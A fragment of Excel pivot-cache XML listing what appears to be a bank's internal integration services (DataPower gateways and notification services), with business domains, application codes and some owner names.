    <s v="Multi Protocol Gateway"/>
    <s v="ServiciosExternos"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IC_GestionRealceTarjetas_GRT"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="Productos"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IC_GestionRecaudoDIAN"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Recaudos"/>
    <s v="Walter Andrés Gómez"/>
    <m/>
    <s v="DIAN"/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IC_GestionSimCard"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="ServiciosExternos"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IC_GestionSolicitudPagos_GSP"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="Productos"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IC_GestionTransaccionesQRBilletera_GTQB"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <x v="15"/>
    <s v="Productor"/>
    <s v="Aceptación"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <s v="Redeban"/>
    <s v="ISNBM001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IC_INALAMBRIA"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="PCC - Programas Comunes Canales_SMS Inalambria_ISPCC0011"/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IC_InformeMinHacienda_IMH"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="ServiciosExternos"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IC_QFLOW_JSON_SERV"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="CANALES_TRADICIONALES"/>
    <s v="Sucursales"/>
    <x v="16"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IC_QFLOW_JSON_USER"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="CANALES_TRADICIONALES"/>
    <s v="Sucursales"/>
    <x v="16"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IC_RoboAdvisor_RA"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="Productos"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IC_SendEmailWithAttach_API"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="Canales"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IC_SimpleCustomerAuthentication_SCA"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="Canales"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IC_TRANSACCION_TOKEN_INVESTBOT_TTI"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="Productos"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IC_TRANSFERENCIAS_INVESTBOT_TI"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Valores"/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicios Valores_AW1273001"/>
    <s v="AW1208001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IC_ValidacionPrimeraSegundaClave_VPSC"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="Canales"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IC_ValidarSesion_VS"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="Canales"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IC_VerificacionCodigoAutorizacion_VCA"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="ServiciosExternos"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_LOGGING_ADAPTER_LA"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="DESARROLLO_DE_SERVICIOS_E_INTEGRACION"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_OAUTH_GPC"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="ServiciosExternos"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_PSE_VALORES"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="Productos"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_REALIZAR_OPERACION_FIDUCIARIA"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Valores"/>
    <x v="19"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_SAP_ERP_TO_EC_COSTCENTER_REP"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="ServiciosExternos"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_SM_AutenticacionCliente_AC"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="Canales"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_SM_AUTENTICAR_USUARIO_AU"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="Canales"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_SM_CIPDC_V2"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="ServiciosExternos"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_SM_ConfirmarIdentidadPersonaEnDataCredito_CIPDC"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="ServiciosExternos"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_SM_ConsultaMarcacionesPersonas"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="Productos"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_SM_ConsultarFuentesPublicasExternas_CFPE"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="ServiciosExternos"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_SM_ConsultaTCRM_CTCRM"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="ServiciosExternos"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_SM_EnvioDataLiquidaPersona_EDLP"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="ApoyoCorporativo"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_SM_GESTION_SESION_GS"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="Canales"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_SM_GESTIONAR_SESION_GS"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="DESARROLLO_DE_SERVICIOS_E_INTEGRACION"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Monitoreo y Transversales"/>
    <s v="Monitoreo y Transversales"/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_SM_GestionarPagareElectronico_GPE"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="ApoyoCorporativo"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_SM_GestionPrecalculadoCliente_GPC"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="Productos"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_SM_Notificacion_Nequi"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="Productos"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_SM_NotificacionCreditoConsumo_NCC"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="Productos"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_SM_NotificacionNovedadTP_NNMA"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="Canales"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_SM_RecuperarCuentasDeposito_RCD"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="Canales"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_SM_VinculacionCuentas_Nequi"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="ServiciosExternos"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_SOMA_MANAGEMENT"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="DESARROLLO_DE_SERVICIOS_E_INTEGRACION"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_WSCADP"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="DESARROLLO_DE_SERVICIOS_E_INTEGRACION"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_WSCADP_V1"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="DESARROLLO_DE_SERVICIOS_E_INTEGRACION"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Notifica Envio Archivo"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Este servicio permite a los diferentes sistemas de Bancolombia, enviar un mensaje de notificación al aplicativo Finacle Recaudos de que se le ha dejado en un FileSystem un archivo para que lo pueda procesar."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Recaudos o Pagos"/>
    <m/>
    <m/>
    <s v="Finacle Ent._Recaudos - Colombia_AW1065001"/>
    <s v="AW01065 _x000d__x000a_PAB _x000d__x000a_TVP _x000d__x000a_AW1065 _x000d__x000a_PSE"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Notifica Envio Archivo Iseries"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Este servicio permite a los diferentes sistemas de Bancolombia, externos al iSeries, enviar un mensaje de notificación a aplicativos existentes en el iSeries Medellin de que se les ha dejado en una ruta IFS un archivo para que lo puedan procesar."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Recaudos o Pagos"/>
    <m/>
    <m/>
    <s v="Finacle Ent._Recaudos - Colombia_AW1065001"/>
    <s v="AW01065 _x000d__x000a_TVP"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Notificacion Archivo Pagos"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio NotificacionArchivoPagos tiene el objetivo de realizar la notificación al proveedor pagos, para informarle que tiene un archivo de lotes en una ruta Ifs, para que él la pueda tomar y posteriormente pueda realizar la ejecución del archivo en lote."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Recaudos o Pagos"/>
    <m/>
    <m/>
    <m/>
    <s v="AW1170 _x000d__x000a_AW1258011"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Notificacion Credito Consumo"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio permite responder al canal Ventas Digitales las diferentes interacciones y pasos que tiene el flujo de solicitud de Credito de consumo."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <x v="0"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <s v="Bankvision - BVL_Cartera moneda legal y extranjera_ISBVL0001"/>
    <s v="AW0937 _x000d__x000a_AW0856"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Notificacion Credito Consumo"/>
    <n v="200"/>
    <x v="0"/>
    <s v="El servicio NotificacionCreditoConsumo permite notificar por parte de Bizagi al aplicativo front los avances de cada uno de los pasos del flujo de crédito de consumo, habilitando así el intercambio de información entre las dos partes hasta completar la venta del producto. "/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <x v="0"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <s v="Bankvision - BVL_Cartera moneda legal y extranjera_ISBVL0001"/>
    <s v="AW0937 _x000d__x000a_AW1285001 _x000d__x000a_AW0856"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Notificacion Entrega Producto Debito"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio Notificar Entrega - Tarjeta Debito - permite llevar a cabo las siguientes funcionalidades:  • Permite al proveedor logístico, notificar la entrega de la tarjeta débito, aclarando los datos finales de entrega."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Debito y Prepago"/>
    <x v="9"/>
    <s v="Productor"/>
    <s v="Tarjetas Débito"/>
    <s v="Soledad Morales Llano"/>
    <m/>
    <m/>
    <s v="APIC _x000d__x000a_AW1285001 _x000d__x000a_NU0104001 _x000d__x000a_NU0170001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Notificacion Envio Reporte Leasing"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio Notificación Envío Reporte Leasing permitirá a los consumidores hacer solicitudes al back de leasing para la generación y envío de algún tipo de reporte de operaciones que por su volumen de información deba ser entregado en buzón seguro."/>
    <s v="LEASING"/>
    <s v="Leasing"/>
    <x v="20"/>
    <s v="Productor"/>
    <s v="Administración del ciclo de vida del activo"/>
    <s v="Juan Pablo Bahamon Betancur"/>
    <m/>
    <m/>
    <s v="AW0360006"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Notificacion Envio Reporte Prestamo"/>
    <n v="100"/>
    <x v="0"/>
    <s v=" Este servicio permite notificar que se debe generar y enviar a buzón seguro, el reporte de los préstamos asociados al convenio"/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <x v="0"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No Tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Notificacion Fin Procesamiento Archivos Depositos"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Provee a las diferentes aplicaciones que estén interesadas en saber cuándo depósitos termina de procesar el archivo que notificaron con anterioridad a depósitos a través del servicio ProcesamientoArchivosDepositos."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <x v="2"/>
    <s v="Productor Transversal"/>
    <s v="Depósitos"/>
    <s v="Leidy Yurany Guarin Lopez"/>
    <m/>
    <s v="Finacle Ent._Recaudos - Colombia_AW1065001"/>
    <s v="AW01065 _x000d__x000a_SAI _x000d__x000a_BVD _x000d__x000a_SUF _x000d__x000a_AW1078"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Notificacion Novedad Mesa Ayuda"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Este servicio permite radicar novedades en la aplicación TPClient a través de la virtualización del servicio WSRegistroNovedades que expone Teleperformance."/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <x v="11"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <s v="Servicio Web Cliente Sufi_AW1083001"/>
    <s v="AW1142001 _x000d__x000a_TP"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Notificacion Respuesta Documental"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio tiene como alcance recibir notificación de respuesta por cada caso de estudio de crédito, del proceso documental entregado por Kofax y expuesto a Bizagi con la confirmación de los documentos digitalizados exitosamente además de las devoluciones por inconsistencias."/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Automatización de Procesos "/>
    <x v="7"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <m/>
    <s v="Bizagi Go_AW0856001"/>
    <s v="AW0922 _x000d__x000a_AW1108001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Notificacion Transacciones Nequi"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio NotificacionTransaccionesNequi, representa la virtualización en el appliance de WebSphere DataPower de una funcionalidad que expone la capa medidora de NEQUI para la recepción de una notificación relacionada con transacciones entre clientes de Bancolombia y clientes de Nequi."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="Finacle (Banco Digital)_AW1011001"/>
    <s v="SVP"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Notificacion Validacion Biometrica"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Servicio a través del cual la aplicación de validación biométrica (Biovoz) notificará al usuario, acciones tales como la regeneración de un token o generación de una nueva contraseña. De igual forma notifica a Teleperformance la acción realizada por parte del usuario."/>
